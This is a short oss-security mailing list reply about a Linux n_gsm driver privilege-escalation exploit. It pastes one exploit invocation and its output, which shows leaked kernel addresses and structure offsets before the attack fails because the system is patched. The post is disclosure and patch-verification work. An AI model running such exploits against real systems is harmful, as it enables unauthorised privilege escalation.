
List:       oss-security
Subject:    Re: [oss-security] New Linux LPE via GSMIOC_SETCONF_DLCI?
From:       "Dr. Christopher Kunz" <info () christopher-kunz ! de>
Date:       2024-04-17 8:47:46
Message-ID: c652582f-f18d-4c70-953d-366c5a721771 () christopher-kunz ! de


On 16.04.24 at 22:16, Solar Designer wrote:
> I'm puzzled by the lack of follow-ups on this, but anyway @FFFVR_
> tweeted they also found (more) vulnerabilities in the n_gsm driver:
>
FWIW, YuriiCrimson's bug for 5.15 - 6.1 seems to be patched on current 
Debian:

debianexploitgsm:/tmp/ExploitGSM/ExploitGSM_5_15_to_6_1$ ./ExploitGSM debian
kallsyms restricted, begin retvial kallsyms table
detected kernel path-> /boot/vmlinuz-6.1.0-20-amd64
detected compressed format -> xz
Uncompressed kernel size -> 65900116
successfully taken kernel!
begin try leak startup_xen!
startup_xen leaked address  -> ffffffff8546f1c0
text leaked address         -> ffffffff83400000
lockdep_map_size     -> 32
spinlock_t_size      -> 4
mutex_size           -> 32
gsm_mux_event_offset -> 56
Error set line discipline N_GSM, Operation not permitted

--cku

